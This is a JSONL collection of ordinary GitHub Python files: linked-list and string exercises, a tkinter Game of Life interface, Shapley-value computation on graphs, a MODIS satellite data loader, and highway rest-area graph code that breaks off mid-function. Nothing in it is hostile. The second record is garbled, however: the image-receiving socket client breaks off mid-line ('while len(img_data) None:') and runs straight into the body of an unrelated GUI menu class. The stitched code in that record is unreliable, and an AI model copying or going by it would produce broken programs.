+{"seq_id":"2951722648","text":"def linkedListPalindrome(head):\n\tslowNode = fastNode = head\n\twhile fastNode is not None and fastNode.next is not None:\n\t\tslowNode = slowNode.next\n\t\tfastNode = fastNode.next.next\n\t\n\treverseList = reverseLinkedList(slowNode)\n\tnode = head\n\twhile reverseList is not None:\n\t\tif node.value != reverseList.value:\n\t\t\treturn False\n\t\tnode = node.next\n\t\treverseList = reverseList.next\n\treturn True\n\t\ndef reverseLinkedList(node):\n\tprevNode = None\n\tcurNode = node\n\twhile curNode is not None:\n\t\tnextNode = curNode.next\n\t\tcurNode.next = prevNode\n\t\tprevNode = curNode\n\t\tcurNode = nextNode\n\treturn prevNode\n\nhead = None\nresults = linkedListPalindrome(head)\nprint(results)","repo_name":"shengng325/LeetCode.py","sub_path":"linkedListPalindrome.py","file_name":"linkedListPalindrome.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37441237468","text":"import socket\r\nimport time\r\n#import cv2, os\r\n\r\nconn = socket.socket() \r\nhost = '169.254.16.35'\r\nport = 8080\r\nconn.connect((host,port)) #Establishes server-client connection\r\nprint(\"Connected to\", host,\" on port\", port) \r\n\r\ndef receive_image():\r\n size = eval(conn.recv(2048).decode()) #returns image size in bytes\r\n conn.send(b'1') \r\n #print(size)\r\n \r\n pack_size = 2048 #splitting image receival pack size into smaller packs, allowing complete capture of image\r\n img_data = b''\r\n while len(img_data) None:\n super().__init__(master)\n\n self.file_menu = tk.Menu(self, tearoff=0)\n self.add_cascade(label=\"File\", menu=self.file_menu)\n self.file_menu.add_command(label=\"Restart (R)\")\n self.file_menu.add_separator()\n self.file_menu.add_command(label=\"Quit (Q)\", command=self.exit_command)\n\n self.settings_menu = tk.Menu(self, tearoff=0)\n self.add_cascade(label=\"Edit\", menu=self.settings_menu)\n self.settings_menu.add_command(label=\"Preferences (S)\", command=self.settings_command)\n\n self.help_menu = tk.Menu(self, tearoff=0)\n self.add_cascade(label=\"Help\", menu=self.help_menu)\n self.help_menu.add_command(label=\"Homepage\", command=self.help_command)\n self.help_menu.add_command(label=\"About\", command=self.about_command)\n\n master.config(menu=self)\n\n def exit_command(self) -> None:\n \"\"\"Closes the game.\"\"\"\n self.master.destroy()\n logger.debug(\"\")\n\n def settings_command(self) -> None:\n settings = SettingsWindow(self.master)\n settings.grab_set()\n logger.debug(\"\")\n\n def help_command(self) -> None:\n url = default_config[\"INFO\"][\"REPOSITORY\"]\n webbrowser.open(url)\n logger.debug(\"\")\n\n def about_command(self) -> None:\n settings = AboutWindow(self.master)\n settings.grab_set()\n logger.debug(\"\")\n\n\nclass SettingsWindow(tk.Toplevel):\n \"\"\"Settings window.\"\"\"\n def __init__(self, master: tk.Misc):\n super().__init__(master)\n self.title(\"Settings\")\n self.resizable(False, False)\n\n # settings\n self.settings = self._init_settings()\n\n # reset button\n self.reset_button = tk.Button(self, text=\"Reset\", padx=20, command=self.reset_command)\n self.reset_button.grid(row=2, column=0, sticky=tk.W, padx=20, pady=10)\n \n # OK button\n self.ok_button = tk.Button(self, text=\"OK\", padx=20, command=self.ok_command)\n self.ok_button.grid(row=2, column=1, sticky=tk.E, padx=10, pady=10)\n\n # Cancel button\n self.cancel_button = tk.Button(self, text=\"cancel\", padx=10, command=self.cancel_command)\n self.cancel_button.grid(row=2, column=2, sticky=tk.E, padx=10, pady=10)\n\n def _init_settings(self) -> dict:\n settings = dict()\n\n # Game settings\n game_settings = ttk.LabelFrame(self, text=\"Game\")\n game_settings.grid(column=0, row=0, padx=20, pady=5, sticky=tk.W)\n # Dimensions of the window \n settings[\"dim\"] = Option(game_settings, config_item=(\"GRID\", \"SIZE\"), label=\"Dimensions of the window\", validation_fn=int)\n settings[\"dim\"].grid(row=0, column=0, sticky=tk.EW)\n # Number of units \n settings[\"units\"] = Option(game_settings, config_item=(\"GRID\", \"UNITS\"), label=\"Number of units\", validation_fn=int)\n settings[\"units\"].grid(row=1, column=0, sticky=tk.EW)\n # FPS\n settings[\"fps\"] = Option(game_settings, config_item=(\"APP\", \"MAX_FPS\"), label=\"Maximum FPS\", validation_fn=int)\n settings[\"fps\"].grid(row=2, column=0, sticky=tk.EW)\n\n # Graphics settings\n graphics = ttk.LabelFrame(self, text=\"Graphics\")\n graphics.grid(column=0, row=1, padx=20, 
pady=5, sticky=tk.W)\n # Alive cell color \n settings[\"alive_cell_color\"] = Option(graphics, config_item=(\"GRID\", \"FOREGROUND\"), label=\"Alive cell color\", validation_fn=ImageColor.getrgb)\n settings[\"alive_cell_color\"].grid(row=0, column=0, sticky=tk.EW) \n # Dead cell color\n settings[\"dead_cell_color\"] = Option(graphics, config_item=(\"GRID\", \"BACKGROUND\"), label=\"Dead cell color\", validation_fn=ImageColor.getrgb)\n settings[\"dead_cell_color\"].grid(row=1, column=0, sticky=tk.EW) \n # Grid color\n settings[\"grid_color\"] = Option(graphics, config_item=(\"GRID\", \"EDGE_COLOR\"), label=\"Grid color\", validation_fn=ImageColor.getrgb)\n settings[\"grid_color\"].grid(row=2, column=0, sticky=tk.EW) \n\n return settings\n\n def ok_command(self) -> None:\n \"\"\"Saves the current configuration to config file and closed the settings window.\"\"\"\n for _, setting in self.settings.items():\n try:\n setting.save_to_config()\n except ValueError as e:\n MessageWindow(self.master, msg_type=\"Error\", msg=str(e))\n return\n\n msg = \"New settings will take effect next time you open the application.\"\n MessageWindow(self.master, msg_type=\"Info\", msg=str(msg))\n self.destroy()\n\n def cancel_command(self) -> None:\n \"\"\"Discards changes and closes the settings window.\"\"\"\n self.destroy()\n\n def reset_command(self) -> None:\n \"\"\"Resets the settings to default and closes the settings window.\"\"\"\n for _, setting in self.settings.items():\n setting.reset_default()\n logger.info(\"Config reset to default.\")\n\n\nclass MessageWindow(tk.Toplevel):\n \"\"\"Generic top-level window displaying a message.\"\"\"\n def __init__(self, master: tk.Misc, msg_type: str, msg: str):\n super().__init__(master)\n self.title(msg_type)\n self.resizable(False, False)\n self.grab_set()\n\n self.label = Label(self, text=msg)\n self.label.grid(row=0, column=0, padx=20, pady=10)\n\n self.ok_button = tk.Button(self, text=\"OK\", padx=20, command=self.destroy)\n self.ok_button.grid(row=1, column=0, padx=10, pady=10)\n\n\nclass AboutWindow(tk.Toplevel):\n \"\"\"Window displaying basic info about the app.\"\"\"\n def __init__(self, master: tk.Misc):\n super().__init__(master)\n self.title(\"About\")\n self.geometry(\"250x200\")\n self.resizable(False, False)\n self.grab_set()\n\n title_text = \"Game of Life\"\n title = ttk.Label(self, text=title_text, font=(\"Arial\",16))\n title.grid(row = 0, column = 0, padx=30, pady=10, sticky=tk.W)\n\n info_text = self._generate_info()\n info = ttk.Label(self, text=info_text)\n info.grid(row = 2, column = 0, sticky=tk.W)\n\n def _generate_info(self) -> str:\n \"\"\"Generates info string.\"\"\" \n # get author and email\n author = default_config[\"INFO\"][\"AUTHOR\"]\n email = default_config[\"INFO\"][\"EMAIL\"]\n version = default_config[\"INFO\"][\"VERSION\"]\n # author_info = project[\"tool.poetry\"][\"authors\"].strip('[\"\"]')\n # author_info = author_info.replace(\">\", \"\")\n # author, email = author_info.split(\" <\")\n\n # get version\n # version = project[\"tool.poetry\"][\"version\"].strip('\"')\n\n info_text = f\"\"\"\n Author: {author} \\n\n Email: {email} \\n\n Version: {version}\n \"\"\"\n\n return info_text\n\n\nclass Option(tk.Frame):\n \"\"\"Option as a pair composed of a label and an entry.\"\"\"\n def __init__(self, master: tk.Misc, config_item: tuple, label: str, validation_fn: Optional[Callable] = None) -> None:\n super().__init__(master)\n self.master = master\n # pairing with an item in the config file\n self.conf_item = config_item\n 
self.validation_fn = validation_fn\n        # label\n        self.label = ttk.Label(self, text=label)\n        self.label.grid(row=0, column=0, sticky=tk.W, padx=20, pady=10)\n        # entry\n        self.entry = ttk.Entry(self, width=8)\n        self.entry.insert('0', config.get(*config_item))\n        self.entry.grid(row=0, column=1, sticky=tk.E, padx=10)\n        self.columnconfigure(1, weight=1)\n\n    def get_value(self) -> Any:\n        return self.entry.get()\n\n    def save_to_config(self) -> None:\n        # fixed: read the entry first so 'value' is defined even when validation_fn is None\n        value = self.entry.get()\n        if self.validation_fn is not None:\n            try:\n                self.validation_fn(value)\n            except ValueError:\n                error_msg = \"Value not supported.\"\n                logger.error(error_msg)\n                raise ValueError(error_msg)\n\n        section, option = self.conf_item\n        config.set(section, option, value=str(value))\n        with open(config_path, 'w') as configfile:\n            config.write(configfile)\n\n        logger.debug(f\"Saved {value} to {self.conf_item} option.\")\n\n    def reset_default(self) -> None:\n        self.entry.delete(0, 'end')\n        self.entry.insert('0', default_config.get(*self.conf_item))\n\n\n\nclass Grid(tk.Canvas):\n    \"\"\"Canvas displaying grid and alive/dead cells.\"\"\"\n    def __init__(\n        self, \n        master: tk.Misc, \n        dim: int, \n        num_units: int, \n        background_color: tuple, \n        foreground_color: tuple, \n        edge_color: str, \n        *args: Any, **kwargs: Any\n    ) -> None:\n        super(Grid, self).__init__(master, width=dim + 1, height=dim + 1, *args, **kwargs)\n        self.edge_color = edge_color\n        self.num_units = num_units\n        self.unit_size = dim / num_units\n        self.dim = dim\n        self.background = np.dstack([\n            np.ones((self.num_units, self.num_units)),\n            np.ones((self.num_units, self.num_units)),\n            np.ones((self.num_units, self.num_units))\n        ]) * background_color\n        self.foreground = np.dstack([\n            np.ones((self.num_units, self.num_units)),\n            np.ones((self.num_units, self.num_units)),\n            np.ones((self.num_units, self.num_units))\n        ]) * foreground_color\n        self.cells = self.create_image(0, 0, anchor=tk.NW, image=None, tag=\"cells\")\n        self.cell_img = None\n\n    def draw_grid(self) -> None:\n        self.delete('grid')\n        for unit in range(self.num_units):\n            pos = unit * self.unit_size\n            self.create_line(0, pos, self.dim, pos, fill=self.edge_color, tag=\"grid\")\n            self.create_line(pos, 0, pos, self.dim, fill=self.edge_color, tag=\"grid\")\n\n    def draw_array(self, cell_array: np.ndarray) -> None:\n        image = Image.fromarray(255 * (1 - cell_array.astype(np.uint8)))\n        # fixed: the canvas stores its pixel size as self.dim; self.size does not exist\n        image = image.resize(size=(self.dim, self.dim), resample=Image.NEAREST)\n        self.cell_img = ImageTk.PhotoImage(image)\n        self.itemconfig(\"cells\", image=self.cell_img)\n        self.tag_lower(\"cells\")\n\n    def draw_img(self, cell_img: ImageTk.PhotoImage) -> None:\n        self.itemconfig(\"cells\", image=cell_img)\n        self.tag_lower(\"cells\")\n\n    def coords_to_grid_position(self, x: int, y: int) -> Tuple[int, int]:\n        i = int(y // self.unit_size)\n        j = int(x // self.unit_size)\n        return i, j\n\n\n\nclass GameOfLifeGUI:\n    \"\"\"GUI for the Game of Life.\"\"\"\n    def __init__(self, master: tk.Tk):\n        self.master = master\n        self.master.title(f\"Game of Life\")\n        icon_path = os.path.join(package_dir, \"resources/images/icon.png\")\n        self.master.iconphoto(True, tk.PhotoImage(file=icon_path))\n        self.master.resizable(False, False)\n\n        # initialize widgets\n        self.widgets = self._init_widgets()\n\n        # canvas update related params\n        self.cells: tk.PhotoImage\n        self.last_time: float\n        self.current_time = time.perf_counter()\n\n        logger.info(\"GUI initialized ...\")\n\n    def _init_widgets(self) -> dict:\n        widgets = dict()\n\n        # menu bar\n        widgets[\"menubar\"] = MenuBar(self.master)\n\n        # 
grid canvas\n widgets[\"grid\"] = Grid(\n master=self.master,\n dim=config.getint(\"GRID\", \"SIZE\"),\n num_units=config.getint(\"GRID\", \"UNITS\"),\n background_color=ImageColor.getrgb(config[\"GRID\"][\"BACKGROUND\"]),\n foreground_color=ImageColor.getrgb(config[\"GRID\"][\"FOREGROUND\"]),\n edge_color=config.get(\"GRID\", \"EDGE_COLOR\"),\n highlightthickness=0\n )\n widgets[\"grid\"].draw_grid()\n widgets[\"grid\"].pack()\n\n return widgets\n\n def _show_fps(self) -> None:\n self.last_time = self.current_time\n self.current_time = time.perf_counter()\n elapsed = self.current_time - self.last_time\n self.master.title(f\"Game of Life ({int(1 / elapsed)} FPS)\")\n\n def show_cells(self, cells: tk.PhotoImage) -> None:\n \"\"\"Handle all cell images currently in the queue, if any.\"\"\"\n self._show_fps()\n self.cells = cells\n self.widgets[\"grid\"].draw_img(self.cells)\n","repo_name":"kuchynkm/game_of_life","sub_path":"game_of_life/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":12711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6436063561","text":"# \"\"\"\n# 题目:\n# Implement strStr().\n#\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n#\n# Example 1:\n#\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n#\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n# Clarification:\n#\n# What should we return when needle is an empty string? This is a great question to ask during an interview.\n#\n# For the purpose of this problem, we will return 0 when needle is an empty string.\n# This is consistent to C's strstr() and Java's indexOf().\n#\n# \"\"\"\n\n\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n \"\"\"\n 自己实现的找子串的函数, 使用字符串切片还挺快的,86%, 而且原来leetcode的运算时间是真的有波动的。\n :param haystack:\n :param needle:\n :return:\n \"\"\"\n if needle == \"\":\n return 0\n\n for i in range(len(haystack)-len(needle) + 1):\n if haystack[i:i+len(needle)] == needle:\n return i\n\n return -1\n\n\n\nif __name__ == '__main__':\n haystack = \"a\"\n needle = \"a\"\n\n solution = Solution()\n result = solution.strStr(haystack, needle)\n print(result)\n\n# \"\"\"\n# 分析:\n#\n# \"\"\"\n","repo_name":"niracler/python-exercise","sub_path":"leetcode/strings/my_strstr.py","file_name":"my_strstr.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"7816657517","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport networkx as nx\n\ndef metcalfe_dfs_tree(G, source, depth_limit=None):\n \"\"\"Returns a dict containing each vertex and its branch and depth.\n Parameters\n ----------\n G : NetworkX graph\n source : node, required\n Specify starting node for depth-first search (the node whose Shapley value\n is being enquired)\n depth_limit : int, optional (default=len(G))\n Specify the maximum search depth\n Returns\n -------\n D : Dictionary\n dict containing each vertex and their branch and depth\n \"\"\"\n \n visited = set()\n if depth_limit is None:\n depth_limit = len(G)\n \n visited.add(source)\n metcalfe_info = {node:(None, None) for node in G.nodes}\n metcalfe_info[source] = (0, 0)\n stack = [(source, 0, iter(G[source]))]\n branch_now = 1\n while stack:\n parent, depth_now, children = stack[-1]\n try:\n child = next(children)\n if child not in visited:\n metcalfe_info[child] = (depth_now + 1, branch_now)\n visited.add(child)\n if depth_now < depth_limit-1:\n stack.append((child, depth_now + 1, iter(G[child])))\n except StopIteration:\n if depth_now <= 1:\n branch_now = branch_now + 1\n stack.pop()\n return metcalfe_info\n\ndef value(G, S, f=None):\n \"\"\"Returns the Metcalfe value of a coalition in a graph.\n Parameters\n ----------\n G : NetworkX graph\n S : subset of nodes of G\n f : list of int containing vertex weights, optional (default=[1 for i in range(len(G.nodes))])\n\n Returns\n -------\n value : Metcalfe value of the subgraph of G induced by S\n \"\"\"\n\n if f == None:\n f = [1 for i in range(len(G.nodes))] \n G_S = nx.induced_subgraph(G, S)\n #nx.draw(G_S, with_labels=True, font_weight='bold')\n conn_comp_S = nx.connected_components(G_S)\n value = 0\n for comp in conn_comp_S:\n tmp = 0\n for node in comp:\n #print(node)\n tmp += f[node] \n value += tmp*tmp\n return value\n\ndef shapley_sub_count(d_ia, d_ib, v):\n \"\"\"Returns an intermediate sum in the Shapley value computation.\n Parameters\n ----------\n d_ia : distance between i and a\n d_ib : distance between i and b\n v : number of vertices\n\n Returns\n -------\n sum : the intermediate sum in shapley computation\n \"\"\"\n k = d_ia+d_ib\n if k == 0:\n return v\n sub_count = 0.0\n for s in range(k, v):\n prod = 1\n for p in range(1, k+1):\n prod *= (s+1-p)/(v-p)\n sub_count += prod\n return sub_count\n \ndef shapley(G, i, f=None):\n \"\"\"Returns the Shapley value of a node in a graph.\n Parameters\n ----------\n G : NetworkX graph\n i : node of G\n f : list of int containing vertex weights, optional (default=[1 for i in range(len(G.nodes))])\n\n Returns\n -------\n shapley : Shapley value of node i\n \"\"\"\n \n if f == None:\n f = [1 for i in range(len(G.nodes))]\n shapley = 0.0\n branch_dist = metcalfe_dfs_tree(G, i)\n for a in G.nodes:\n if branch_dist[a][1] == None:\n continue\n for b in G.nodes:\n if branch_dist[b][1] == None:\n continue\n if branch_dist[a][1] != branch_dist[b][1] or (a == b and a == i):\n shapley += f[a]*f[b]*shapley_sub_count(branch_dist[a][0], branch_dist[b][0], len(G.nodes))\n return shapley/len(G.nodes)\n","repo_name":"Mishalassif/network-shapley","sub_path":"metcalfe_shapley_tree.py","file_name":"metcalfe_shapley_tree.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29162267579","text":"# -*- coding: utf-8 -*-\nimport math\nimport os\nimport numpy as np\nimport pandas as pd\n\nfrom pyhdf.SD import SD, SDC\nfrom pyhdf.error import HDF4Error\nfrom sklearn.neighbors import KDTree\nimport util\n\nDEFAULT_VALUE = -999999.0\nTIME_THRESHOLD = 1800 # max allowed time error: 30 minutes\nDIST_THRESHOLD = 10000 # max allowed distance error: 10 km\n\nclass Modis(object):\n    def __init__(self, file_path):\n        self.file_path = file_path\n        self.time_arr = None\n        self.time2dataDF = dict()\n        self.time2data_tree = dict()\n        self.time2modis_type = dict()\n        self.col_num = 0\n\n    def load_data(self):\n        if not os.path.isdir(self.file_path):\n            print('this is not a directory: ' + self.file_path)\n            return -1\n\n        files = os.listdir(self.file_path)\n        valid_files = [file for file in files if file.endswith('.hdf')]\n\n        for valid_file in valid_files:\n            result = dict()\n            file_name = valid_file\n            #debug code\n            #if '2019152.0610' not in file_name:\n            #    continue\n            #debug end\n            mod_type_fields = file_name.strip().split('_')\n            mod_type = mod_type_fields[0][:3]\n\n            date_time_fields = file_name.strip().split('.')\n            date_time_str = date_time_fields[1][1:] + '.' + date_time_fields[2]\n            timestamp = util.get_timestamp_modis(date_time_str)\n\n            total_file_name = os.path.join(self.file_path, valid_file)\n            file = None\n            try:\n                file = SD(total_file_name)\n            except HDF4Error as e:\n                print('open file error.', total_file_name)\n                continue\n\n            sds_obj1 = file.select('Water_Vapor_Infrared')\n            pwv_ir = sds_obj1.get()\n            _, n_cols = np.shape(pwv_ir)\n            self.col_num = n_cols\n            pwv_ir = pwv_ir.flatten()\n            sds_obj2 = file.select('Longitude')\n            lng = sds_obj2.get().flatten()\n            sds_obj3 = file.select('Latitude')\n            lat = sds_obj3.get().flatten()\n\n            result['modis_pwv'] = pwv_ir\n            result['lng'] = lng\n            result['lat'] = lat\n\n            resultDF = pd.DataFrame(result)\n            self.time2dataDF[timestamp] = resultDF\n            self.time2modis_type[timestamp] = mod_type\n\n        self.time_arr = sorted(self.time2dataDF.keys())\n        print(\"all modis data loaded.\")\n\n        return 0\n\n    def build_kdtree(self):\n        for timestamp in self.time2dataDF:\n            dataDF = self.time2dataDF[timestamp]\n            lnglat_arr = np.array([point for point in zip(dataDF['lng'].values, dataDF['lat'].values)])\n            lnglat_tree = KDTree(lnglat_arr)\n            self.time2data_tree[timestamp] = lnglat_tree\n\n        print('all kdtrees built.')\n        return 0\n\n    def _build_all(self):\n        res = self.load_data()\n        if res != 0:\n            print(\"load modis data fail.\")\n            return -1\n        res = self.build_kdtree()\n        if res != 0:\n            print(\"build kdtree fail.\")\n            return -1\n\n        return 0\n\n    def _get_nearest_data(self, lng, lat, timestamp):\n        index = np.searchsorted(self.time_arr, timestamp)\n        if index >= len(self.time_arr):\n            index = len(self.time_arr) - 1\n        elif index > 0 and math.fabs(self.time_arr[index-1]-timestamp) < math.fabs(self.time_arr[index]-timestamp):\n            index -= 1\n        nearest_timestamp = self.time_arr[index]\n\n        if math.fabs(nearest_timestamp - timestamp) > TIME_THRESHOLD:\n            return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n        # fixed: dict.has_key() was removed in Python 3; use the 'in' operator\n        if nearest_timestamp not in self.time2data_tree:\n            print('can not find any timestamp in time2data_tree', nearest_timestamp)\n            return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n        if nearest_timestamp not in self.time2modis_type:\n            print('can not find any timestamp in time2modis_type', nearest_timestamp)\n            return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n        lnglat_tree = self.time2data_tree[nearest_timestamp]\n        inds = lnglat_tree.query(np.array([lng, lat]).reshape(1,-1), k=1, return_distance=False)\n\n        modis_type = self.time2modis_type[nearest_timestamp]\n\n        if nearest_timestamp not in self.time2dataDF:\n            print('can not find any timestamp in time2dataDF.', nearest_timestamp)\n            return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n        resultDF = self.time2dataDF[nearest_timestamp]\n        # fixed: DataFrame.ix was removed from pandas; use positional .iloc\n        resultLine = resultDF.iloc[inds[0]]\n        nearest_lng = resultLine['lng']\n        nearest_lat = resultLine['lat']\n\n        if util.calc_dist(lng, lat, nearest_lng, nearest_lat) > DIST_THRESHOLD:\n            return DEFAULT_VALUE, DEFAULT_VALUE, ''\n\n        return resultLine['modis_pwv'].values[0], nearest_timestamp, modis_type\n\n    def _get_col_num(self):\n        return self.col_num\n\nif __name__ == '__main__':\n    modis = Modis(file_path='/Users/didi/Documents/hjy/MODIS-TPW/')\n    res = modis._build_all()\n    if res != 0:\n        print(\"build all fail.\")\n        exit(-1)","repo_name":"amanilr/modis_ground","sub_path":"modis.py","file_name":"modis.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8409286042","text":"import json\nimport math\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\ndef load_json_data(file_path):\n \"\"\"\n Loads JSON data from a file.\n\n Parameters:\n - file_path (str): The path to the JSON file.\n\n Returns:\n - dict: The loaded JSON data.\n \"\"\"\n with open(file_path, 'r') as file:\n json_data = json.load(file)\n return json_data\n\ndef save_json_data(data, file_path):\n # Save the dictionary to a file\n with open(f\"{file_path}\", \"w\") as f:\n json.dump(data, f)\n \n#returns a tuple of (lat, lon)\ndef get_coords(id, nodes):\n \n #find the node with the 'own_id'\n row = next((node for node in nodes if node['id'] == id), None)\n\n #returns the lat and long\n return(row['lat'], row['lon'])\n\ndef get_line(id, nodes):\n row = next((node for node in nodes if node['id'] == id), None)\n\n return row\n\n#return 1 if true, 0 if false\ndef check_if_node_is_junction(id, nodes):\n row = next((node for node in nodes if node['id'] == id), None)\n\n if 'tags' in row:\n tags = row['tags']\n if 'highway' in tags and tags['highway'] == 'motorway_junction': \n return 1\n return 0\n\n#calculates the distance between two points and returns the distance in km\ndef get_distance(lat1, lon1, lat2, lon2):\n\n R = 6371.0\n\n # Convert latitude and longitude from degrees to radians\n lat1_rad = math.radians(lat1)\n lon1_rad = math.radians(lon1)\n lat2_rad = math.radians(lat2)\n lon2_rad = math.radians(lon2)\n\n # Haversine formula\n dlon = lon2_rad - lon1_rad\n dlat = lat2_rad - lat1_rad\n a = math.sin(dlat / 2)**2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2)**2\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n distance = R * c\n \n #return distance in km\n return distance\n\n#splits the json_data and returns a tuple (nodes, ways)\ndef split_array_service_stations(json_data):\n \n ways = []\n nodes = []\n\n for el in json_data[\"elements\"]:\n if el[\"type\"] == \"node\":\n nodes.append(el)\n\n\n elif el[\"type\"] == \"way\":\n ways.append(el)\n\n else:\n print(\"ERROR: There shouldn't be another type (except node and way)\")\n return (nodes, ways) \n \n#splits the json_data and returns a tuple (nodes, highway)\ndef split_array_highway(json_data):\n \n nodes = []\n highway = []\n\n for el in json_data[\"elements\"]:\n #is a node\n if el[\"type\"] == \"node\":\n nodes.append(el)\n\n elif el[\"type\"] == \"way\":\n highway.append(el)\n else:\n print(\"ERROR: There shouldn't be another type (except node and way)\")\n return (nodes, highway) \n\n#returns the (lat, lon) of the centroids of every service station way\ndef merge_area_to_point(way_service, nodes_service): # service node\n\n #calculate the centroid of every area\n centroids = []\n for el in way_service:\n lats = []\n lons = []\n #get the coordinates for every node and add to list\n for ids in el['nodes']:\n lat, lon = get_coords(ids, nodes_service)\n lats.append(lat)\n lons.append(lon)\n \n #calculate centroid\n centroid_lat = sum(lats) / len(lats)\n centroid_lon = sum(lons) / len(lons)\n centroids.append((centroid_lat, centroid_lon))\n\n #delete centroids that are within 0.1 km of an already kept one\n sorted_centroids = []\n for lat1, lon1 in centroids:\n for lat2, lon2 in sorted_centroids:\n if get_distance(lat1, lon1, lat2, lon2) < 0.1:\n #don't include point, a kept centroid is already too close\n break\n else:\n sorted_centroids.append((lat1, lon1))\n\n return sorted_centroids\n\n#returns a list of id. All the nodes in this list represent a rest area\ndef add_service_to_highway(nodes_highway, service):\n marked_street_nodes = []\n\n for lat, lon in service:\n # Find nearest point in nodes\n nearest_id = \"\" \n nearest_distance = float('inf') # Initialize with positive infinity\n\n for el in nodes_highway:\n distance = get_distance(lat, lon, el['lat'], el['lon'])\n \n # Check if the ID is not in marked_street_nodes before updating\n if el['id'] not in marked_street_nodes and distance < nearest_distance:\n nearest_id = el['id']\n nearest_distance = distance\n\n # Add nearest point to the marked list\n if nearest_id not in marked_street_nodes:\n marked_street_nodes.append(nearest_id)\n\n return marked_street_nodes\n\n\n#deletes every highway node, which is not marked (which doesn't represent a rest area)\ndef delete_usless_highway_nodes(way_highway, marked_nodes):\n #print(marked_nodes)\n #for every street\n for el in way_highway:\n #check each point, if it's a marked one, if not delete\n marked_ids = []\n for node_id in el['nodes']:\n #check if nodes are marked, if yes add to list\n if node_id in marked_nodes:\n \n marked_ids.append(node_id)\n print(\"appended\")\n #reset list of nodes on the highway to only the marked ones\n el['nodes'] = marked_ids \n\n return way_highway\n \n#adds a property to each node with name 'own_id' and an index starting with 0\ndef add_own_id(nodes):\n i = 0\n for el in nodes:\n el['own_id'] = i\n i += 1\n return nodes\n \n#gets the lat and long of the node with the given overpass id\ndef get_position_id(id, nodes):\n \n #find the node with the 'id'\n row = next((node for node in nodes if node['id'] == id), None)\n\n #returns the lat and long\n return(row['lat'], row['lon'])\n \n#gets the lat and long of the node with own_id == id\ndef get_position_own_id(id, nodes):\n \n #find the node with the 'own_id'\n row = next((node for node in nodes if node['own_id'] == id), None)\n\n #returns the lat and long\n return(row['lat'], row['lon'])\n\ndef create_edges_array(nodes, ways):\n \n\n #get all edges with own_id (not the overpass_id) \n edges = []\n for el in ways:\n way_nodes = el['nodes']\n num = len(way_nodes)\n for i in range (0, num-1):\n #get overpass id\n overpass_id_a = int(way_nodes[i])\n overpass_id_b = int(way_nodes[i+1])\n\n #get own_id\n anode = next((node for node in nodes if node['id'] == overpass_id_a), None)\n bnode = next((node for node in nodes if node['id'] == overpass_id_b), None)\n \n aid = anode['own_id']\n bid = bnode['own_id']\n\n #add edge with own_ids\n edges.append((aid, bid))\n print(edges)\n \n \n #delete double edges\n unique_edges = []\n for edge in edges:\n if edge not in unique_edges and (edge[1], edge[0]) not in unique_edges:\n unique_edges.append(edge)\n\n #get length of edges\n unique_distance_edges = []\n for a, b in unique_edges:\n lata, lona = get_position_own_id(a, nodes)\n latb, lonb = get_position_own_id(b, nodes)\n distance = get_distance(lata, lona, latb, lonb)\n unique_distance_edges.append((a, b, distance))\n \n #delete edges > 60km\n final_edges = []\n for a, b, dis in unique_distance_edges:\n if dis < 60:\n final_edges.append((a,b, dis))\n \n return final_edges\n\n#deletes all nodes which aren't in the to_keep_ids list (overpass id)\ndef delete_useless_street_nodes_of_nodes_array(nodes, to_keep_ids):\n sorted_nodes = []\n for el in nodes:\n if el['id'] in to_keep_ids:\n sorted_nodes.append(el)\n \n return sorted_nodes\n\n#creates a graph\ndef create_graph(nodes, edges):\n\n #Create a graph \n g = nx.Graph()\n\n #add_nodes\n for 
el in nodes:\n #print(f\"nodes: {el['own_id']}, pos=({el['lat']}, {el['lon']})\")\n g.add_node(el['own_id'], pos=(el['lat'], el['lon']))\n\n #add edges with distance\n for el in edges:\n #print(f\"edges: {el[0]}, {el[1]}, {el[2]}\")\n g.add_edge(el[0], el[1], weight=el[2])\n \n # Extract node positions\n node_positions = {node: (lon, lat) for node, (lat, lon) in nx.get_node_attributes(g, 'pos').items()}\n\n # Get the edgelist\n edgelist = list(g.edges())\n\n # Create a scatter plot of nodes\n plt.figure(figsize=(8, 6))\n nx.draw_networkx_nodes(g, pos=node_positions, node_size=200, node_color='blue', alpha=0.7)\n\n\n # Draw edges with weights as labels\n nx.draw_networkx_edges(g, pos=node_positions, edgelist=edgelist, width=2, alpha=0.5, edge_color='gray')\n #edge_labels = nx.get_edge_attributes(g, 'weight')\n #nx.draw_networkx_edge_labels(g, pos=node_positions, edge_labels=edge_labels)\n\n # Display the plot\n plt.title(\"Graph of Nodes in France\")\n plt.axis('off') # Turn off axis labels\n plt.show()\n\ndef create_graph2(nodes, edges, othernodes):\n\n #Create a graph \n g = nx.Graph()\n\n max_own_id = 0\n\n #add_nodes\n for el in nodes:\n #print(f\"nodes: {el['own_id']}, pos=({el['lat']}, {el['lon']})\")\n g.add_node(el['own_id'], pos=(el['lat'], el['lon']), color='red')\n if el['own_id'] > max_own_id:\n max_own_id = el['own_id']\n #add edges with distance\n for el in edges:\n #print(f\"edges: {el[0]}, {el[1]}, {el[2]}\")\n g.add_edge(el[0], el[1], 